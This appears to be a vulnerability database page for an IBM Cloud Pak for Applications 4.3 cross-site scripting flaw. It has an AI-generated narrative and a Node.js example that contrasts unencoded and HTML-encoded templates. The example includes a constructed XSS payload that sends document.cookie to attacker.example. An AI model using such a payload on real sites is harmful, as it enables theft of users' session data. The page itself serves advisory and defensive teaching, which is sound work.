CVE-2021-20363
Description
IBM Cloud Pak for Applications 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 195034.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
IBM Cloud Pak for Applications 4.3 is vulnerable to cross-site scripting in its Web UI, allowing an authenticated, low-privileged user to inject arbitrary JavaScript that runs in other users' sessions and can disclose their credentials.
Vulnerability
IBM Cloud Pak for Applications version 4.3 is vulnerable to cross-site scripting (XSS) in its Web UI. A user with low privileges can embed arbitrary JavaScript code that the UI later renders, so the code executes in the context of other users' sessions. The advisory lists version 4.3 as the affected release [1]; the description does not name the vulnerable field or state whether the payload is stored or reflected.
Exploitation
An attacker needs a valid low-privileged account on the IBM Cloud Pak for Applications instance (CVSS PR:L). The attacker injects JavaScript into a field or parameter that the Web UI later renders without encoding it for its HTML context. When another user, including a privileged one, views the affected page, the injected script executes in that user's browser; the vector's UI:R means the victim must take some action, such as following a link, for this to happen [1].
Impact
Successful exploitation runs arbitrary JavaScript in the victim's browser within their authenticated session. The script can read data the page exposes, issue requests that carry the victim's session, and so disclose credentials or act on the victim's behalf; cookies set with HttpOnly cannot be read through document.cookie but are still attached to such requests. The CVSS vector rates confidentiality and integrity impact as low and marks a scope change, since the code runs in the victim's browser rather than in the vulnerable component (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) [1].
Mitigation
IBM addressed the issue in IBM Cloud Pak for Applications 4.3.1; affected users should upgrade to 4.3.1 or later. The advisory lists no workarounds or mitigations [1].
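The Exploitation, Impact and Mitigation sections above describe the pattern in prose. The following is an added example written for this page, not code from IBM Cloud Pak for Applications or from the advisory, that models the same pattern in Node.js: a template that interpolates a user-supplied field without encoding, the same template with HTML encoding, a check that tells the two renderings apart, and a look at which cookies such a script could actually read. The "display name" field, the probe payload and the Set-Cookie lines are all constructed for illustration; the advisory does not name the vulnerable field or publish a payload for CVE-2021-20363.

```javascript
// Added example (not IBM's code). Runs under Node.js with no dependencies.

// Constructed probe payload (hypothetical; not a payload published for this CVE).
// If it reaches the page unencoded, the browser fires onerror and sends whatever
// document.cookie exposes to an attacker-controlled host.
const PROBE = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// HTML-encode a value for insertion into element text or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: a user-controlled field is concatenated into markup as-is.
// (Hypothetical template; the real vulnerable field is not named in the advisory.)
function renderVulnerable(displayName) {
  return `<li class="user">${displayName}</li>`;
}

// Hardened pattern: the same template with output encoding applied.
function renderHardened(displayName) {
  return `<li class="user">${escapeHtml(displayName)}</li>`;
}

// Check: which element tags in the rendered HTML are not part of the template, and
// which inline event-handler attributes (onerror, onload, ...) appear inside a tag?
// A deliberately crude tag scan for comparing two renderings of one input, not a parser.
function injectedMarkup(html, templateTags) {
  const allowed = new Set(templateTags.map((t) => t.toLowerCase()));
  const tags = [];
  for (const m of html.matchAll(/<\s*\/?\s*([a-zA-Z][\w-]*)/g)) {
    const name = m[1].toLowerCase();
    if (!allowed.has(name) && !tags.includes(name)) tags.push(name);
  }
  const handlers = [];
  for (const m of html.matchAll(/<[a-zA-Z][^>]*?\s(on[a-z]+)\s*=/gi)) {
    const name = m[1].toLowerCase();
    if (!handlers.includes(name)) handlers.push(name);
  }
  return { tags, handlers };
}

// Which cookies could the probe's document.cookie read? Only those set without HttpOnly.
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly(\s*;|\s*$)/i.test(h))
    .map((h) => h.split('=')[0].trim());
}

// Constructed Set-Cookie lines for illustration (not from the product).
const SAMPLE_SET_COOKIE = [
  'session=abc123; Path=/; Secure; HttpOnly',
  'ui_prefs=dark; Path=/',
];

console.log('vulnerable:', renderVulnerable(PROBE));
console.log('  injected:', injectedMarkup(renderVulnerable(PROBE), ['li']));
console.log('hardened:  ', renderHardened(PROBE));
console.log('  injected:', injectedMarkup(renderHardened(PROBE), ['li']));
console.log('cookies readable by script:', scriptReadableCookies(SAMPLE_SET_COOKIE));
```

Run with `node` to print both renderings. In the vulnerable output the scan reports an `img` tag and an `onerror` handler that came from the input; in the hardened output the probe survives only as inert text (`&lt;img ...&gt;`) and the scan reports nothing. The cookie check shows why HttpOnly limits the credential-disclosure path the advisory describes but does not remove it: `session` is unreadable from script, yet a script running in the victim's page can still send requests that carry it.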
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
- Range: =4.3
- IBM / Cloud Pak for Applications (v5), Range: 4.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (2)
- exchange.xforce.ibmcloud.com/vulnerabilities/195034 (MITRE: vdb-entry, x_refsource_XF)
- www.ibm.com/support/pages/node/6471341 (MITRE: x_refsource_CONFIRM)
News mentions
No linked articles in our index yet.